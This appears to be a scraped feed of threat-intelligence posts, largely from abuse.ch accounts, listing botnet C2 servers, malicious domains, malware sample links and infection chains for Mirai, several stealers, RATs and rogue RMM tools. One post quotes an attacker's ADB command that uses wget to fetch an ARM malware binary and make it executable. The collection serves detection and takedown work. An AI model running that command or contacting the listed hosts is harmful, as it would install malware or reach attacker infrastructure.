📢 SERVICE UPDATE | As you may have noticed, we've experienced some downtime recently which was largely caused by a small number of users exceeding our Fair Use Policy. To protect platform stability and ensure fair access for everyone as our user base grows, we are introducing API rate limits. 1/2
It's here!! The @abuse_ch #CommunityHub is LIVE 🔥🔥🔥 Every day, this community shares data that helps take down malicious infrastructure and now you can see the scale of it, all in one place. The Hub gives you a live view of:
JackSkid malware spreading from 46.151.178.13 (SINOWORLDWIDE 🇳🇱) on exposed devices running Android Debug Bridge (ADB) ⤵️ ADB command: ⚙️ shell:busybox wget 94.154.0.43 .48/rebirth.arm7 -O /data/local/tmp/com.supercell.clashroyal; chmod 777 [...]
URLhaus - 94.154.43.48
Malware distribution URLs hosted on 94.154.43.48
urlhaus.abuse.ch
Interesting unlabeled malware sample shared by our friend smica83, apparently targeting UA users 🇺🇦🕵️ The malware sample: 1️⃣ Obtains the DNS A record of ns2.theendlessweb .com 2️⃣ Queries directly the DNS A record (207.90.251 .10) for the DNS TXT record of sni13.docsmanagement.endl .site
Something new is coming for abuse.ch contributors... watch this space! 👀 #ComingSoon #CommunityHub #SharingIsCaring 😻🥇💛
Our platforms were recently targeted by a large-scale web scraping operation originating from devices that are apparently participating in residential proxy networks 🏘️ 🖥️ . The vast majority of these requests were successfully blocked by our existing mitigations 🛑 .
Botnet C2 tied to an unidentified #malware family trying to hide as FortiGate device 😜 🌐 Domain: az2030port.duckdns .org 📡 C2: 178.16.55.28:2030 ➡️ Omegatech LTD 🇳🇱 🔐 SSL certificate: FortiGate, O=Fortinet Ltd. Corresponding malware samples ⤵️ hunting.abuse.ch/hunt/6a285c8...
My favorite Remus botnet C2 domain so far 😄 havelbeenpwned .net ⤵️ NICENIC INTERNATIONAL🇨🇳 103.211.219.238:4219⤵️ AS394695 PUBLIC-DOMAIN-REGISTRY 🇮🇳 Malware sample: bazaar.abuse.ch/sample/75fce... More #Remnus IOCs available on ThreatFox 🦊 threatfox.abuse.ch/browse/malwa... /cc @troyhunt.com
Malspam 📧 targeting Spanish users 🇪🇸 Email ➡️ geo filter ➡️ mediafire ➡️ iso ➡️ vbs 1st stage - geo filter 🛑 vmi3228488.contaboserver .net Contabo 🇩🇪 2nd stage - payload 📄 🌐 urlhaus.abuse.ch/url/3824487/ Dropped iso: bazaar.abuse.ch/sample/faaa4... Botnet C2: 📡 54.197.208.68 Amazon 🇺🇸
SparkRAT ➡️ ChromeSetup.msi ➡️ FUD 🔥 msftconnecttest .xyz ⤵️ Creation Date: 2024-12-02 ⤵️ After more than a year, this domain still has a detection rate of 1/93 🤯 Pointing to ⤵️ 154.31.222.217:443 ➡️ DControl Chinese? 🇨🇳 lang="zh-cn" Malware sample: bazaar.abuse.ch/sample/91a29...
MalwareBazaar - ChromeSetup.msi (SparkRAT)
ChromeSetup.msi has been detected as SparkRAT by MalwareBazaar
bazaar.abuse.ch
Proofpoint recently identified a fake RMM (Remote Monitoring and Management Tool) called #TrustConnect and #DocConnect🔎💻 Pivoting the threat in our collection reveals that the threat actors spread the same malware under additional names, including: ➡️SoftConnect ➡️HardConnect ➡️AxisControl
Rogue #ScreenConnect RMM 🕵️♂️ Botnet C2: 📡 no.windowupdateservice .com 📡 relay.windowupdateservice .com 📡193.26.115.51:8041 Payload delivery URL: 🌐 urlhaus.abuse.ch/url/3782937/ Malware sample 📄: bazaar.abuse.ch/sample/77dc5... More ScreenConnect RMM IOCs ⤵️ threatfox.abuse.ch/browse/tag/S...
Yet another RAT in town: RemoteX🖥️🖱️ 🪲 Dropped by Amadey 📃 Written in Golang 💻 Uses HKCU\...\CurrentVersion\Run\RemoteX for persitence (lame 🚽) 🌐 Uses WebSocket for C2 communication 🕵️♂️ Unauthenticated RAT admin panel 🤡 Botnet C2: 📡 109.107.168.147:80 (Partner Hosting LTD 🇬🇧)
Xillen Stealer 🎣, heavily dropped by Amadey 🔥 Botnet C2: https://goldenring[.]live/api/logs/check "Invisible. Undetectedable. Unstopable." 🤡 👉 github.com/BengaminButt... Samples ⤵️ bazaar.abuse.ch/browse/signa... Additional IOCs on ThreatFox 🦊 threatfox.abuse.ch/browse/tag/X...
Thank you @spamhaustech.bsky.social & @abuse-ch.bsky.social for being #PIVOTcon26 Silver Sponsor 🎉 Read more about alliance: abuse.ch & spamhaus.com This alliance empowers the largest independently crowdsourced intelligence of tracked malware and botnets pivotcon.org/sponsors #CTI #ThreatIntel
Brazillian banker 🇧🇷 caught by @johnk3r 🎣 GHOST panel 🧐 007consultoriafinanceira .net 83.229.17.124:80 Clouvider 🇺🇸 Payload delivery URL: 🌐https://urlhaus.abuse.ch/url/3759148/ Malware sample (MSI): ⚙️https://bazaar.abuse.ch/sample/2cbafc607c5d38a891ab89799f98b6b754b519706eb6597e4c4f2d4f6fc5db21/
Malspam sent from Microsoft Outlook that is spreading #LogMeIn GoToResolve RMM, enabling threat actors to access the victim's machine from remote 💻🔍🕵️ IOCs: 📡 adwestmailcenter .com ➡️ Landing page 📡 insightme .im ➡️ fake PDF download
CHICXULUB IMPACT 💥 Botnet C2 URLs: 📡 turbokent .name/api/initialize 📡 turbokent .name/api/status Sponsoring domain registrar: NICENIC 🇭🇰 Malware sample 📄: bazaar.abuse.ch/sample/c32e1...
New Stealer in town: SantaStealer 🎅🎄 Botnet C2s ➡️all hosted at AS399486 VIRTUO 🇨🇦: 📡31.57.38.119:6767 📡31.57.38.244:6767 📡80.76.49.114:6767 Stealer admin panel (via @darkwebinformer.com 💪): 🕵️ stealer. su Artifacts 💻: C:\tempLog\Clipboard.txt %LocalAppData%\Temp\passwordslog.txt
'Tis the season for a new infostealer: #SantaStealer. Active promotion on Telegram and underground forums state the malware-as-a-service plans to be released before year-end. Rapid7 Labs analyzed unstripped samples to detail how it operates and what defenders should know: https://r-7.co/4q5pk75
Love letter ❤️ from a threat actor 🕵️exploiting React2Shell vulnerability (CVE-2025-55182) to spread #Mirai malware ⤵️ fuckoffurlhaus 😂 Payload URLs: 🌐 urlhaus.abuse.ch/host/45.153.... Mirai botnet C2s: 📡 marvisxoxo .st (ISTanCo 🇷🇸) 📡 45.156.87 .231:23789 (AS51396 PFCLOUD 🇩🇪)
Unknown malware using WebSockets for botnet command&control, spreading through #ClickFix ⤵️ 🖱️ClickFix -> 📃VBS -> ⚙️MSI Payload delivery host: 🌐https://urlhaus.abuse.ch/host/103.27.157.60/ Malware sample 🤖: bazaar.abuse.ch/sample/4d8e5... Botnet C2 domains: 📡w2li .xyz 📡w2socks .xyz
Exploitation of recent React RCE vul (CVE-2025-55182 - #React2Shell) leading to #Mirai infection ⤵️ Botnet Mirai C2 domains 📡: fuckphillipthegerman .ru Botnet Mirai C2 servers , all hosted at FORTIS 🇷🇺: 138.124.72.251:52896 138.124.69.154:60328 5.144.176.19:60328
MaksRAT HKCU\Software\Microsoft\Windows\CurrentVersion\Run\javacom Botnet C2s 📡 104.198.24 .41:6656 avocado .gay www.foldacces .online www.makslove .xyz www.mavenrat .xyz www.blackprofit .online Sample shared by @smica83 💪 bazaar.abuse.ch/sample/88310... IOCs threatfox.abuse.ch/browse/tag/M...
Mirai campaign spreading through 213.209.143.85 (Railnet 🇳🇱), messing around with the victim's system iptables 🤔 Mirai botnet C2 domain: womp.datasurge .vip (NameCheap 🇺🇸) Mirai botnet C2 server: 176.65.148.57:6969 (Pfcloud 🇩🇪) Payload URL: 🌐 urlhaus.abuse.ch/url/3725743/
Mirai botnet #zerobot spreading through 172.86.123.179 (cloudzy 🇦🇪) ⤵️ Mirai botnet C2 domain: 0bot.qzz .io (Gandi SAS 🇫🇷) Mirai botnet C2 server: 140.233.190.96:69 (Internet Magnate 🇿🇦) Payload URLs: 🌐 urlhaus.abuse.ch/host/172.86.... Mirai malware sample: 🤖 bazaar.abuse.ch/sample/9f64e...
🎉 Massive shout out to URLhaus Top Contributor “geenensp” First seen April 13th 2020 and since then, they’ve shared an unbelievable 844,345 malware URLs!! 😮 Over the last 30 days, they have shared 8,902 URLs, firmly securing their position at the top of the leaderboard 💪 ⤵️
Yet another new stealer in town: #ArkanixStealer 🔥 %AppData%\Arkanix_lol\history.json %AppData%\Arkanix_lol\system_info.json %AppData%\Arkanix_lol\screenshot_monitor_1.png Akranix botnet C2: 📡 arkanix .pw/api/session/create 📡 arkanix .pw/delivery 📡 arkanix .pw/api/discord-injection/template
Potential new stealer dropped by #Amadey 🤖🔍Who can name it? ⤵️ 👉 hunting.abuse.ch/hunt/6919ec1... Botnet C2 domains: 📡defender-temeerty .sbs 📡telemetry-defender .lol Botnet C2 server: 🛑185.100.157.69:443 (Partner Hosting 🇬🇧) Malware sample: 📄 bazaar.abuse.ch/sample/903cd...
#OpEndgame 📣: We assisted in the takedown of infrastructure associated with #Rhadamanthys and share a full list of botnet C2s on ThreatFox 🦊 Full list of Rhadamanthys botnet C2s: 📡 threatfox.abuse.ch/browse/tag/O... Europol press release: 🚨 www.europol.europa.eu/media-press/...